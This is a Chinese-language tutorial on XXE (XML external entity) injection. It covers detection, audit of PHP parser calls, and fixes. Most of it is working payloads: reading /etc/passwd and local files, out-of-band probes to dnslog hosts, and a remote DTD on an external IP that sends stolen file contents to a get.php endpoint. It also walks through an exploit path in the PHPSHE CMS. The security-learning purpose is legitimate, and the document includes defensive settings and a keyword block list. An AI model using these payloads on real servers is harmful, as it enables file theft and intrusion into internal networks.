知识点

1、XML 支持实体（entities），可以引用外部资源（文件 / URL）。

2、如果解析器没关外部实体，就能被你塞入恶意实体。

3、回显 → 直接读文件；无回显 → OOB（带外）；还能配合 DTD、伪协议做各种操作。

一、XML介绍

XML被设计为传输和存储数据，XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素，其焦点是数据的内容，其把数据从HTML分离，是独立于软件和硬件的信息传输工具。等同于JSON传输。

XXE漏洞XML External Entity Injection，即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取（最常见）、命令执行（第三方库）、内网扫描、攻击内网等危害。

xml语言被后端语言解析，可能回显数据

1、XML 与 HTML 的主要差异

XML 被设计为传输和存储数据，其焦点是数据的内容。

HTML 被设计用来显示数据，其焦点是数据的外观。

HTML 旨在显示信息 ，而XML旨在传输存储信息。

Example：网站的xml文件解析

危害类似SSRF，都是读取文件，但是产生原因不同，内网方面的利用可以加载外部实体，改成内网地址

2、传输格式

xml是一个文档，数据量比较大，带恶意代码则会解析

客户端：xml发送数据
服务端：xml解析数据

常规格式
username=admin&password=123456

JSON
{
    account{
        name:"xiaozhu",
        age :"23",
    }
    society{
        xxx:"pig",
        yyy:"egg",
    }
}

xml传输格式：
<user><username>admin</username><password>123456</password></user>

二、XXE黑盒发现

决定 XXE 能不能打的不是前端，而是后端解析器

1、获取得到Content-Type或数据类型为xml时，尝试xml语言payload进行测试

2、不管获取的Content-Type类型或数据传输类型，均可尝试修改后提交测试xxe

3、XXE不仅在数据传输上可能存在漏洞，同样在文件上传、引用插件解析或预览也会造成文件中的XXE Payload被执行

XXE探测步骤

1、回显test则表明支持dtd

<!DOCTYPE a [<!ENTITY b "test">]><x>$a;</x>

2、直接读文件

<?xml version = "1.0"?>
<!DOCTYPE ANY [
      <!ENTITY test SYSTEM "file:///etc/passwd">
]>
<x>$test;</x>

3、带外

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY %d SYSTEM "http://dnglog.cn">
%d;
]>
<x>$test;</x>

三、XXE白盒发现

无回显处理

实体替换不能嵌套 URL 拼接
例如 file=/etc/passwd 无法直接拼到 URL，所以必须借助外部 DTD

白盒审计（绕回显即可）

1、可通过应用功能追踪代码定位审计

2、可通过脚本特定函数搜索定位审计

3、可通过伪协议玩法绕过相关修复等

PHP常见解释器

simplexml_load_string()
simplexml_load_file()
DOMDocument::loadXML()
libxml_disable_entity_loader(false)（危险）

四、XXE修复防御方案

方案1-禁用外部实体

PHP:
libxml_disable_entity_loader(true);

JAVA:
DocumentBuilderFactory dbf
=DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);

Python：
from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案2-过滤用户提交的XML数据

过滤关键词：<!DOCTYPE和<!ENTITY，或者SYSTEM和PUBLIC

五、XML利用、玩法

1、读取文件：

<?xml version="1.0"?>
<!DOCTYPE xiaodi [
<!ENTITY test SYSTEM "file:///d:/1.txt">
]>
<user><username>&test;</username><password>xiaodi</password></user>

1.1、带外测试：

<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://9v57ll.dnslog.cn">
%file;
]>
<user><username>&send;</username><password>xiaodi</password></user>

2、外部引用实体dtd：

<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://127.0.0.1:8081/xiaodi.dtd">
%file;
]>
<user><username>&send;</username><password>xiaodi</password></user>
xiaodi.dtd
<!ENTITY send SYSTEM "file:///d:/1.txt">

3、无回显读文件

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/1.txt">
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
test.dtd
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">

4、其他玩法（协议）-见参考地址

CTF XXE - MustaphaMond - 博客园

六、黑盒步骤

web.jarvisoj.com:9882

流程：功能分析-前端提交-源码&抓包-构造Paylod测试

更改请求数据格式：Content-Type

<?xml version = "1.0"?>

<!DOCTYPE ANY [

<!ENTITY f SYSTEM "file:///etc/passwd">

]>

<x>&f;</x>

七、白盒CMS、PHPSHE

审计流程：

1、漏洞函数simplexml_load_string
2、pe_getxml函数调用了漏洞函数
3、wechat_getxml调用了pe_getxml
4、notify_url调用了wechat_getxml
访问notify_url文件触发wechat_getxml函数,构造Paylod测试

先尝试读取文件，无回显后带外测试：

<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://1uwlwv.dnslog.cn">
%file;
]>
<root>&send;</root>

然后带外传递数据解决无回显：

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/1.txt">
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
test.dtd：
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">

小结

多练